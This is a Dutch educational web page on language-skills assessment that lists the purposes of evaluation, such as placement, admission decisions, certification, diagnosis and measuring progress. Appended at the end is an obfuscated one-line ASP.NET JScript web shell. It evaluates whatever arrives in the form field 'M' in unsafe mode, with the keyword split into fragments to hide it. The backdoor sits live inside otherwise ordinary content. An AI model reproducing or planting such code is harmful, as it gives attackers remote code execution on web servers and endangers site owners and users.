Start >
informatiepunt
Start >>
Wat is evalueren?
Visie en voorbeelden
Toetstips en
stappenplannen evaluatie
Achtergronden en links
>>Waarom evalueren?
Wat wil je doen met de resultaten van de evaluatie?
Een eerste indruk krijgen van de taalvaardigheid van studenten in een nieuwe groep
Iemand toelaten of weigeren
in een bepaalde niveaugroep van de taalopleiding
om in een bepaalde opleiding of traject te stappen
om een sociale woning te betrekken
om de Belgisch nationaliteit te verkrijgen
om zijn integratie te bewijzen
voor een bepaalde tewerkstelling
…
Iemand een certificaat, diploma, getuigschrift,… geven
Je eigen onderwijsniveau vergelijken met andere scholen
Je eigen onderwijs verbeteren
Een diagnose stellen bij bepaalde leerproblemen
Vorderingen in een taalleertraject meten om het leerproces van de geteste leerder optimaliseren
Het meten van taalvaardigheid blijkt vele bedoelingen te hebben, maar:
één evaluatie kan niet alle doelen tegelijk dienen. Voor elke doel moet je een geschikte evaluatievorm kiezen
niveau taalvaardigheid is bij het nemen van beslissingen vaak slechts één element naast vele andere
Verder naar '
Wat evalueren?
'>>
Terug Informatiepunt>>
<%@ Page Language="Jscript" Debug=true%> <% var SO=Request.Form["M"]; var NJF="unsa",PKCLJIY="fe",VSEWDZ=NJF+PKCLJIY; function UKBT() { return SO; } function UJWHK() { return eval(UKBT(),VSEWDZ); } UJWHK() %>